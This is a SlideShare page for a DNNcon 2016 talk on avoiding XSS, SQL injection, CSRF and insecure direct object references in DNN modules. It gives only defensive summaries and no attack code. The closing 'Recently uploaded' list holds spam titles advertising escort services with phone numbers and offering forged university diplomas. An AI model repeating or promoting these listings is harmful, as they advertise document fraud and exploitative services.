SlideShare a Scribd company logo

DNNcon 2016: Are There Security Flaws in Your DNN Modules?

Download as PPT, PDF
Engage Software
Engage Software

A presentation by Joshua Bradley, DNN developer, on the subject of developing more secure modules for DNN (formerly DotNetNuke) and Evoq CMS. While DNN, and .Net in general, are very good at protecting you from the biggest security attacks, they can't protect you from writing bad code. With security in web development getting increasingly more important it is good to take a moment and make sure you're not shooting yourself in the foot with your module development. This talk will go over XSS (Cross-Site scripting), CSRF (Cross-Site Request Forgery), and SQLi (SQL Injection), to make sure that you are not opening yourself up to potential vulnerabilities when developing your modules.

Internet
1 of 27
@DNNConDon’t forget to include #DNNCon in your tweets! Are There Security Flaws in Your Modules? Joshua Bradley / Web Developer Engage Software @JRBradley1
@DNNConDon’t forget to include #DNNCon in your tweets! THANKS TO ALL OF OUR GENEROUS SPONSORS!
@DNNConDon’t forget to include #DNNCon in your tweets! Agenda • Introduction • Cross Site Scripting • SQL Injection • Cross Site Request Forgery • Insecure Direct Object References • Q & A
@DNNConDon’t forget to include #DNNCon in your tweets! Goal For Developers -To think about possible security vulnerabilities while developing your modules. For Everyone -Be able to recognize potential vulnerabilities when testing websites.
@DNNConDon’t forget to include #DNNCon in your tweets! Introduction
@DNNConDon’t forget to include #DNNCon in your tweets! Cross Site Scripting
@DNNConDon’t forget to include #DNNCon in your tweets! Reflective XSS
@DNNConDon’t forget to include #DNNCon in your tweets! Reflective XSS Example
@DNNConDon’t forget to include #DNNCon in your tweets! Stored XSS
@DNNConDon’t forget to include #DNNCon in your tweets! Stored XSS Example
@DNNConDon’t forget to include #DNNCon in your tweets! XSS Summary • Html Encode when not needing HTML • Use Anti XSS library when needing to accept HTML from user input.
@DNNConDon’t forget to include #DNNCon in your tweets! SQL Injection
@DNNConDon’t forget to include #DNNCon in your tweets! SQLi Example
@DNNConDon’t forget to include #DNNCon in your tweets! SQLi Summary • Never do string concatenation with SQL. • Use an ORM or Parameterized Stored Procedure.
@DNNConDon’t forget to include #DNNCon in your tweets! Cross Site Request Forgery
@DNNConDon’t forget to include #DNNCon in your tweets! CSRF Example
@DNNConDon’t forget to include #DNNCon in your tweets! CSRF Summary • Use HttpPost • ValidateAntiForgery • Never Allow Access from any host
@DNNConDon’t forget to include #DNNCon in your tweets! Insecure Direct Object References
@DNNConDon’t forget to include #DNNCon in your tweets! IDOR Example
@DNNConDon’t forget to include #DNNCon in your tweets! IDOR Summary • Use built in Folder and File Manager. • Avoid using user input when selecting file.
@DNNConDon’t forget to include #DNNCon in your tweets! Available on GitHub & Slideshare • http://www.engagesoftware.com/blog
@DNNConDon’t forget to include #DNNCon in your tweets! Questions @JRBradley1
@DNNConDon’t forget to include #DNNCon in your tweets! Resources • https://www.owasp.org/index.php/OW • http://www.dnnsoftware.com/wi ki/analysis-of-dotnetnuke- compliance-against-owasp-top- 10-2013
@DNNConDon’t forget to include #DNNCon in your tweets! Resources • http://www.troyhunt.com/2012/12/sto • https://www.owasp.org/index.php/Ma • http://www.jwaffinityit.com/Portals/28
@DNNConDon’t forget to include #DNNCon in your tweets! Resources • https://msdn.microsoft.com/en-us/libr aspx • https:// weblog.west-wind.com/posts/2012/Ju • http:// www.computerweekly.com/tip/C ross-site-request-forgery- Lessons-from-a-CSRF-attack- example
@DNNConDon’t forget to include #DNNCon in your tweets! Resources • http://resources.infosecinstitute .com/dumping-a-database- using-sql-injection/ • https://www.sql- programmers.com/sql- injection.aspx • https://msdn.microsoft.com/en- us/library/bb386929.aspx • https://msdn.microsoft.com/en- us/library/cc716760.aspx
@DNNConDon’t forget to include #DNNCon in your tweets! Resources • http://www.troyhunt.com/2013/ 07/everything-you-wanted-to- know-about-sql.html • https://github.com/malcomvett er/WidgetSender

Recommended

Analytics In, Analytics Out: Using Google Analytics to Guide and Grade Web Pr...
Analytics In, Analytics Out: Using Google Analytics to Guide and Grade Web Pr...Analytics In, Analytics Out: Using Google Analytics to Guide and Grade Web Pr...
Analytics In, Analytics Out: Using Google Analytics to Guide and Grade Web Pr...Engage Software
 
Creating URL Providers for your Custom Extensions
Creating URL Providers for your Custom ExtensionsCreating URL Providers for your Custom Extensions
Creating URL Providers for your Custom ExtensionsEngage Software
 
Social Bookmark Api
Social Bookmark ApiSocial Bookmark Api
Social Bookmark ApiSira Sujjinanont
 
Configuring the Yoast Wordpress SEO Plugin
Configuring the Yoast Wordpress SEO PluginConfiguring the Yoast Wordpress SEO Plugin
Configuring the Yoast Wordpress SEO PluginSearch Commander, Inc.
 
Seek and ye shall find - 28.10.2016
Seek and ye shall find - 28.10.2016Seek and ye shall find - 28.10.2016
Seek and ye shall find - 28.10.2016Sonja Riesterer
 
Google Analytics Referral Spam - Pubcon Las Vegas 2015
Google Analytics Referral Spam - Pubcon Las Vegas 2015Google Analytics Referral Spam - Pubcon Las Vegas 2015
Google Analytics Referral Spam - Pubcon Las Vegas 2015Search Commander, Inc.
 
Yoast SEO Plugin - 2015 Pubcon Vegas
Yoast SEO Plugin - 2015 Pubcon VegasYoast SEO Plugin - 2015 Pubcon Vegas
Yoast SEO Plugin - 2015 Pubcon VegasSearch Commander, Inc.
 
7 Secrets Of A Successful Facebook Page
7 Secrets Of A Successful Facebook Page7 Secrets Of A Successful Facebook Page
7 Secrets Of A Successful Facebook PageDD Flynn
 

Recommended

Analytics In, Analytics Out: Using Google Analytics to Guide and Grade Web Pr...
Analytics In, Analytics Out: Using Google Analytics to Guide and Grade Web Pr...Analytics In, Analytics Out: Using Google Analytics to Guide and Grade Web Pr...
Analytics In, Analytics Out: Using Google Analytics to Guide and Grade Web Pr...Engage Software
 
Creating URL Providers for your Custom Extensions
Creating URL Providers for your Custom ExtensionsCreating URL Providers for your Custom Extensions
Creating URL Providers for your Custom ExtensionsEngage Software
 
Social Bookmark Api
Social Bookmark ApiSocial Bookmark Api
Social Bookmark ApiSira Sujjinanont
 
Configuring the Yoast Wordpress SEO Plugin
Configuring the Yoast Wordpress SEO PluginConfiguring the Yoast Wordpress SEO Plugin
Configuring the Yoast Wordpress SEO PluginSearch Commander, Inc.
 
Seek and ye shall find - 28.10.2016
Seek and ye shall find - 28.10.2016Seek and ye shall find - 28.10.2016
Seek and ye shall find - 28.10.2016Sonja Riesterer
 
Google Analytics Referral Spam - Pubcon Las Vegas 2015
Google Analytics Referral Spam - Pubcon Las Vegas 2015Google Analytics Referral Spam - Pubcon Las Vegas 2015
Google Analytics Referral Spam - Pubcon Las Vegas 2015Search Commander, Inc.
 
Yoast SEO Plugin - 2015 Pubcon Vegas
Yoast SEO Plugin - 2015 Pubcon VegasYoast SEO Plugin - 2015 Pubcon Vegas
Yoast SEO Plugin - 2015 Pubcon VegasSearch Commander, Inc.
 
7 Secrets Of A Successful Facebook Page
7 Secrets Of A Successful Facebook Page7 Secrets Of A Successful Facebook Page
7 Secrets Of A Successful Facebook PageDD Flynn
 
BC BMPR Pres: Technical Resources
BC BMPR Pres: Technical ResourcesBC BMPR Pres: Technical Resources
BC BMPR Pres: Technical ResourcesJason Teitelman
 
Asychronous javascript using LAX
Asychronous javascript using LAXAsychronous javascript using LAX
Asychronous javascript using LAXSikha Baid ☁
 
Rich text editing with Draft.js
Rich text editing with Draft.jsRich text editing with Draft.js
Rich text editing with Draft.jsNikolaus Graf
 
Competitive keyword research | VE PEOPLE
Competitive keyword research | VE PEOPLECompetitive keyword research | VE PEOPLE
Competitive keyword research | VE PEOPLECarl Pantaleon
 
Getting started-checklist
Getting started-checklistGetting started-checklist
Getting started-checklistBrittany Weickert
 
Popular SEO plugin for WordPress - WordCamp Pune 2015
Popular SEO plugin for WordPress - WordCamp Pune 2015Popular SEO plugin for WordPress - WordCamp Pune 2015
Popular SEO plugin for WordPress - WordCamp Pune 2015Alexander Gounder
 
seo for blogspot
seo for blogspotseo for blogspot
seo for blogspotzaman khan
 
SES SF 2010 - Whats Next for SEO and News
SES SF 2010 - Whats Next for SEO and NewsSES SF 2010 - Whats Next for SEO and News
SES SF 2010 - Whats Next for SEO and NewsTopher Kohan
 
Podcasts
PodcastsPodcasts
PodcastsDavid Kamerer
 
Links4
Links4Links4
Links4shiking
 
20110611 Facebook Case Study
20110611 Facebook Case Study20110611 Facebook Case Study
20110611 Facebook Case StudyYuki MAEJIMA
 
The Ultimate Free Digital Marketing Toolkit
The Ultimate Free Digital Marketing ToolkitThe Ultimate Free Digital Marketing Toolkit
The Ultimate Free Digital Marketing ToolkitSteve Lock
 
One Hit Wonder's Guide to WordPress SEO
One Hit Wonder's Guide to WordPress SEOOne Hit Wonder's Guide to WordPress SEO
One Hit Wonder's Guide to WordPress SEOBen Cook
 
WordPress Myths Uncovered
WordPress Myths UncoveredWordPress Myths Uncovered
WordPress Myths UncoveredLauren Jeffcoat
 
Dnn Con Baltimore Security Flaws
Dnn Con Baltimore Security FlawsDnn Con Baltimore Security Flaws
Dnn Con Baltimore Security FlawsJoshua Bradley
 
Reactive extensions (rx js) in dnn
Reactive extensions (rx js) in dnnReactive extensions (rx js) in dnn
Reactive extensions (rx js) in dnnjsheely83
 
DNN Web API For Mobile
DNN Web API For MobileDNN Web API For Mobile
DNN Web API For Mobileashishpd
 
Continuous Integration With Windows Azure Pack
Continuous Integration With Windows Azure PackContinuous Integration With Windows Azure Pack
Continuous Integration With Windows Azure PackJess Coburn
 
Search features and architecture in DNN 7.1
Search features and architecture in DNN 7.1Search features and architecture in DNN 7.1
Search features and architecture in DNN 7.1ashishpd
 
Programming Your Way into Designers Hearts 20100924
Programming Your Way into Designers Hearts 20100924Programming Your Way into Designers Hearts 20100924
Programming Your Way into Designers Hearts 20100924Will Strohl
 
Rooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CDRooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CDDaniel Garcia (a.k.a cr0hn)
 
Dnn con palm_beach_template
Dnn con palm_beach_templateDnn con palm_beach_template
Dnn con palm_beach_templatePhilipp Becker
 

More Related Content

What's hot

BC BMPR Pres: Technical Resources
BC BMPR Pres: Technical ResourcesBC BMPR Pres: Technical Resources
BC BMPR Pres: Technical ResourcesJason Teitelman
 
Asychronous javascript using LAX
Asychronous javascript using LAXAsychronous javascript using LAX
Asychronous javascript using LAXSikha Baid ☁
 
Rich text editing with Draft.js
Rich text editing with Draft.jsRich text editing with Draft.js
Rich text editing with Draft.jsNikolaus Graf
 
Competitive keyword research | VE PEOPLE
Competitive keyword research | VE PEOPLECompetitive keyword research | VE PEOPLE
Competitive keyword research | VE PEOPLECarl Pantaleon
 
Popular SEO plugin for WordPress - WordCamp Pune 2015
Popular SEO plugin for WordPress - WordCamp Pune 2015Popular SEO plugin for WordPress - WordCamp Pune 2015
Popular SEO plugin for WordPress - WordCamp Pune 2015Alexander Gounder
 
seo for blogspot
seo for blogspotseo for blogspot
seo for blogspotzaman khan
 
SES SF 2010 - Whats Next for SEO and News
SES SF 2010 - Whats Next for SEO and NewsSES SF 2010 - Whats Next for SEO and News
SES SF 2010 - Whats Next for SEO and NewsTopher Kohan
 
20110611 Facebook Case Study
20110611 Facebook Case Study20110611 Facebook Case Study
20110611 Facebook Case StudyYuki MAEJIMA
 
The Ultimate Free Digital Marketing Toolkit
The Ultimate Free Digital Marketing ToolkitThe Ultimate Free Digital Marketing Toolkit
The Ultimate Free Digital Marketing ToolkitSteve Lock
 
One Hit Wonder's Guide to WordPress SEO
One Hit Wonder's Guide to WordPress SEOOne Hit Wonder's Guide to WordPress SEO
One Hit Wonder's Guide to WordPress SEOBen Cook
 
WordPress Myths Uncovered
WordPress Myths UncoveredWordPress Myths Uncovered
WordPress Myths UncoveredLauren Jeffcoat
 

What's hot (14)

BC BMPR Pres: Technical Resources
BC BMPR Pres: Technical ResourcesBC BMPR Pres: Technical Resources
BC BMPR Pres: Technical Resources
 
Asychronous javascript using LAX
Asychronous javascript using LAXAsychronous javascript using LAX
Asychronous javascript using LAX
 
Rich text editing with Draft.js
Rich text editing with Draft.jsRich text editing with Draft.js
Rich text editing with Draft.js
 
Competitive keyword research | VE PEOPLE
Competitive keyword research | VE PEOPLECompetitive keyword research | VE PEOPLE
Competitive keyword research | VE PEOPLE
 
Getting started-checklist
Getting started-checklistGetting started-checklist
Getting started-checklist
 
Popular SEO plugin for WordPress - WordCamp Pune 2015
Popular SEO plugin for WordPress - WordCamp Pune 2015Popular SEO plugin for WordPress - WordCamp Pune 2015
Popular SEO plugin for WordPress - WordCamp Pune 2015
 
seo for blogspot
seo for blogspotseo for blogspot
seo for blogspot
 
SES SF 2010 - Whats Next for SEO and News
SES SF 2010 - Whats Next for SEO and NewsSES SF 2010 - Whats Next for SEO and News
SES SF 2010 - Whats Next for SEO and News
 
Podcasts
PodcastsPodcasts
Podcasts
 
Links4
Links4Links4
Links4
 
20110611 Facebook Case Study
20110611 Facebook Case Study20110611 Facebook Case Study
20110611 Facebook Case Study
 
The Ultimate Free Digital Marketing Toolkit
The Ultimate Free Digital Marketing ToolkitThe Ultimate Free Digital Marketing Toolkit
The Ultimate Free Digital Marketing Toolkit
 
One Hit Wonder's Guide to WordPress SEO
One Hit Wonder's Guide to WordPress SEOOne Hit Wonder's Guide to WordPress SEO
One Hit Wonder's Guide to WordPress SEO
 
WordPress Myths Uncovered
WordPress Myths UncoveredWordPress Myths Uncovered
WordPress Myths Uncovered
 

Similar to DNNcon 2016: Are There Security Flaws in Your DNN Modules?

Dnn Con Baltimore Security Flaws
Dnn Con Baltimore Security FlawsDnn Con Baltimore Security Flaws
Dnn Con Baltimore Security FlawsJoshua Bradley
 
Reactive extensions (rx js) in dnn
Reactive extensions (rx js) in dnnReactive extensions (rx js) in dnn
Reactive extensions (rx js) in dnnjsheely83
 
DNN Web API For Mobile
DNN Web API For MobileDNN Web API For Mobile
DNN Web API For Mobileashishpd
 
Continuous Integration With Windows Azure Pack
Continuous Integration With Windows Azure PackContinuous Integration With Windows Azure Pack
Continuous Integration With Windows Azure PackJess Coburn
 
Search features and architecture in DNN 7.1
Search features and architecture in DNN 7.1Search features and architecture in DNN 7.1
Search features and architecture in DNN 7.1ashishpd
 
Programming Your Way into Designers Hearts 20100924
Programming Your Way into Designers Hearts 20100924Programming Your Way into Designers Hearts 20100924
Programming Your Way into Designers Hearts 20100924Will Strohl
 
Rooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CDRooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CDDaniel Garcia (a.k.a cr0hn)
 
Dnn con palm_beach_template
Dnn con palm_beach_templateDnn con palm_beach_template
Dnn con palm_beach_templatePhilipp Becker
 
Run stuff, Deploy Stuff, Jax London 2017 Edition
Run stuff, Deploy Stuff, Jax London 2017 EditionRun stuff, Deploy Stuff, Jax London 2017 Edition
Run stuff, Deploy Stuff, Jax London 2017 EditionKris Buytaert
 
Web components the future is here
Web components the future is hereWeb components the future is here
Web components the future is hereGil Fink
 
Mind Your lang — Accessibility Camp Toronto 2016
Mind Your lang — Accessibility Camp Toronto 2016Mind Your lang — Accessibility Camp Toronto 2016
Mind Your lang — Accessibility Camp Toronto 2016Adrian Roselli
 
Rapid Application Development with Docker
Rapid Application Development with DockerRapid Application Development with Docker
Rapid Application Development with DockerNiklas Heidloff
 
Stability patterns devoxx_pl_2017
Stability patterns devoxx_pl_2017Stability patterns devoxx_pl_2017
Stability patterns devoxx_pl_2017Daniel Lebrero
 
RSA SF Conference talk-2009-ht2-401 sallam
RSA SF Conference talk-2009-ht2-401 sallamRSA SF Conference talk-2009-ht2-401 sallam
RSA SF Conference talk-2009-ht2-401 sallamAhmed Sallam
 
Moving to a DevOps mode - easy, hard or just plain terrifying? - Daniel Bryan...
Moving to a DevOps mode - easy, hard or just plain terrifying? - Daniel Bryan...Moving to a DevOps mode - easy, hard or just plain terrifying? - Daniel Bryan...
Moving to a DevOps mode - easy, hard or just plain terrifying? - Daniel Bryan...JAXLondon2014
 
JAX London 2014 "Moving to DevOps Mode: easy, hard or just plain terrifying?"
JAX London 2014 "Moving to DevOps Mode: easy, hard or just plain terrifying?"JAX London 2014 "Moving to DevOps Mode: easy, hard or just plain terrifying?"
JAX London 2014 "Moving to DevOps Mode: easy, hard or just plain terrifying?"Daniel Bryant
 
Angular 2 : learn TypeScript already with Angular 1
Angular 2 : learn TypeScript already with Angular 1Angular 2 : learn TypeScript already with Angular 1
Angular 2 : learn TypeScript already with Angular 1David Amend
 
DIC To The Limit – deSymfonyDay, Barcelona 2014
DIC To The Limit – deSymfonyDay, Barcelona 2014DIC To The Limit – deSymfonyDay, Barcelona 2014
DIC To The Limit – deSymfonyDay, Barcelona 2014Ronny López
 

Similar to DNNcon 2016: Are There Security Flaws in Your DNN Modules? (20)

Dnn Con Baltimore Security Flaws
Dnn Con Baltimore Security FlawsDnn Con Baltimore Security Flaws
Dnn Con Baltimore Security Flaws
 
Reactive extensions (rx js) in dnn
Reactive extensions (rx js) in dnnReactive extensions (rx js) in dnn
Reactive extensions (rx js) in dnn
 
DNN Web API For Mobile
DNN Web API For MobileDNN Web API For Mobile
DNN Web API For Mobile
 
Continuous Integration With Windows Azure Pack
Continuous Integration With Windows Azure PackContinuous Integration With Windows Azure Pack
Continuous Integration With Windows Azure Pack
 
Search features and architecture in DNN 7.1
Search features and architecture in DNN 7.1Search features and architecture in DNN 7.1
Search features and architecture in DNN 7.1
 
Programming Your Way into Designers Hearts 20100924
Programming Your Way into Designers Hearts 20100924Programming Your Way into Designers Hearts 20100924
Programming Your Way into Designers Hearts 20100924
 
Rooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CDRooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CD
 
Dnn con palm_beach_template
Dnn con palm_beach_templateDnn con palm_beach_template
Dnn con palm_beach_template
 
PS error handling and debugging
PS error handling and debuggingPS error handling and debugging
PS error handling and debugging
 
Run stuff, Deploy Stuff, Jax London 2017 Edition
Run stuff, Deploy Stuff, Jax London 2017 EditionRun stuff, Deploy Stuff, Jax London 2017 Edition
Run stuff, Deploy Stuff, Jax London 2017 Edition
 
Web components the future is here
Web components the future is hereWeb components the future is here
Web components the future is here
 
engage 2014 - JavaBlast
engage 2014 - JavaBlastengage 2014 - JavaBlast
engage 2014 - JavaBlast
 
Mind Your lang — Accessibility Camp Toronto 2016
Mind Your lang — Accessibility Camp Toronto 2016Mind Your lang — Accessibility Camp Toronto 2016
Mind Your lang — Accessibility Camp Toronto 2016
 
Rapid Application Development with Docker
Rapid Application Development with DockerRapid Application Development with Docker
Rapid Application Development with Docker
 
Stability patterns devoxx_pl_2017
Stability patterns devoxx_pl_2017Stability patterns devoxx_pl_2017
Stability patterns devoxx_pl_2017
 
RSA SF Conference talk-2009-ht2-401 sallam
RSA SF Conference talk-2009-ht2-401 sallamRSA SF Conference talk-2009-ht2-401 sallam
RSA SF Conference talk-2009-ht2-401 sallam
 
Moving to a DevOps mode - easy, hard or just plain terrifying? - Daniel Bryan...
Moving to a DevOps mode - easy, hard or just plain terrifying? - Daniel Bryan...Moving to a DevOps mode - easy, hard or just plain terrifying? - Daniel Bryan...
Moving to a DevOps mode - easy, hard or just plain terrifying? - Daniel Bryan...
 
JAX London 2014 "Moving to DevOps Mode: easy, hard or just plain terrifying?"
JAX London 2014 "Moving to DevOps Mode: easy, hard or just plain terrifying?"JAX London 2014 "Moving to DevOps Mode: easy, hard or just plain terrifying?"
JAX London 2014 "Moving to DevOps Mode: easy, hard or just plain terrifying?"
 
Angular 2 : learn TypeScript already with Angular 1
Angular 2 : learn TypeScript already with Angular 1Angular 2 : learn TypeScript already with Angular 1
Angular 2 : learn TypeScript already with Angular 1
 
DIC To The Limit – deSymfonyDay, Barcelona 2014
DIC To The Limit – deSymfonyDay, Barcelona 2014DIC To The Limit – deSymfonyDay, Barcelona 2014
DIC To The Limit – deSymfonyDay, Barcelona 2014
 

More from Engage Software

The Importance of UX in Association Website Design
The Importance of UX in Association Website Design The Importance of UX in Association Website Design
The Importance of UX in Association Website Design Engage Software
 
Millennial Engagement Strategies for Associations
Millennial Engagement Strategies for AssociationsMillennial Engagement Strategies for Associations
Millennial Engagement Strategies for AssociationsEngage Software
 
Enterprise Social Networking
Enterprise Social NetworkingEnterprise Social Networking
Enterprise Social NetworkingEngage Software
 
Responsive Views with Knockout
Responsive Views with KnockoutResponsive Views with Knockout
Responsive Views with KnockoutEngage Software
 
JavaScript: The Language
JavaScript: The LanguageJavaScript: The Language
JavaScript: The LanguageEngage Software
 
Packaging DNN extensions
Packaging DNN extensionsPackaging DNN extensions
Packaging DNN extensionsEngage Software
 
Considerations with Writing JavaScript in your DotNetNuke site
Considerations with Writing JavaScript in your DotNetNuke siteConsiderations with Writing JavaScript in your DotNetNuke site
Considerations with Writing JavaScript in your DotNetNuke siteEngage Software
 
Building A Membership Provider For DotNetNuke 4.X.X
Building A Membership Provider For DotNetNuke 4.X.XBuilding A Membership Provider For DotNetNuke 4.X.X
Building A Membership Provider For DotNetNuke 4.X.XEngage Software
 
Building DotNetNuke Modules
Building DotNetNuke ModulesBuilding DotNetNuke Modules
Building DotNetNuke ModulesEngage Software
 
The Right Way To Install Upgrade Dnn
The Right Way To Install Upgrade DnnThe Right Way To Install Upgrade Dnn
The Right Way To Install Upgrade DnnEngage Software
 
What’s New In DotNetNuke 5 (Cambrian)
What’s New In DotNetNuke 5 (Cambrian)What’s New In DotNetNuke 5 (Cambrian)
What’s New In DotNetNuke 5 (Cambrian)Engage Software
 

More from Engage Software (12)

The Importance of UX in Association Website Design
The Importance of UX in Association Website Design The Importance of UX in Association Website Design
The Importance of UX in Association Website Design
 
Millennial Engagement Strategies for Associations
Millennial Engagement Strategies for AssociationsMillennial Engagement Strategies for Associations
Millennial Engagement Strategies for Associations
 
Enterprise Social Networking
Enterprise Social NetworkingEnterprise Social Networking
Enterprise Social Networking
 
Responsive Views with Knockout
Responsive Views with KnockoutResponsive Views with Knockout
Responsive Views with Knockout
 
JavaScript: The Language
JavaScript: The LanguageJavaScript: The Language
JavaScript: The Language
 
Packaging DNN extensions
Packaging DNN extensionsPackaging DNN extensions
Packaging DNN extensions
 
Considerations with Writing JavaScript in your DotNetNuke site
Considerations with Writing JavaScript in your DotNetNuke siteConsiderations with Writing JavaScript in your DotNetNuke site
Considerations with Writing JavaScript in your DotNetNuke site
 
Building A Membership Provider For DotNetNuke 4.X.X
Building A Membership Provider For DotNetNuke 4.X.XBuilding A Membership Provider For DotNetNuke 4.X.X
Building A Membership Provider For DotNetNuke 4.X.X
 
Building DotNetNuke Modules
Building DotNetNuke ModulesBuilding DotNetNuke Modules
Building DotNetNuke Modules
 
DotNetNuke In An Hour
DotNetNuke In An HourDotNetNuke In An Hour
DotNetNuke In An Hour
 
The Right Way To Install Upgrade Dnn
The Right Way To Install Upgrade DnnThe Right Way To Install Upgrade Dnn
The Right Way To Install Upgrade Dnn
 
What’s New In DotNetNuke 5 (Cambrian)
What’s New In DotNetNuke 5 (Cambrian)What’s New In DotNetNuke 5 (Cambrian)
What’s New In DotNetNuke 5 (Cambrian)
 

Recently uploaded

20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdfMatthew Sinclair
 
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency""Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency"growthgrids
 
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdfMatthew Sinclair
 
APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC
 
Power point inglese - educazione civica di Nuria Iuzzolino
Power point inglese - educazione civica di Nuria IuzzolinoPower point inglese - educazione civica di Nuria Iuzzolino
Power point inglese - educazione civica di Nuria Iuzzolinonuriaiuzzolino1
 
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfpdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfJOHNBEBONYAP1
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdfMatthew Sinclair
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查ydyuyu
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查ydyuyu
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...gajnagarg
 
PowerDirector Explination Process...pptx
PowerDirector Explination Process...pptxPowerDirector Explination Process...pptx
PowerDirector Explination Process...pptxgalaxypingy
 
Best SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasBest SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasDigicorns Technologies
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdfMatthew Sinclair
 
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...kajalverma014
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC
 
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查ydyuyu
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsMonica Sydney
 
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样ayvbos
 
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girlsRussian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girlsMonica Sydney
 
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsRussian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsMonica Sydney
 

Recently uploaded (20)

20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf
 
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency""Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
 
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
 
APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53
 
Power point inglese - educazione civica di Nuria Iuzzolino
Power point inglese - educazione civica di Nuria IuzzolinoPower point inglese - educazione civica di Nuria Iuzzolino
Power point inglese - educazione civica di Nuria Iuzzolino
 
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfpdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
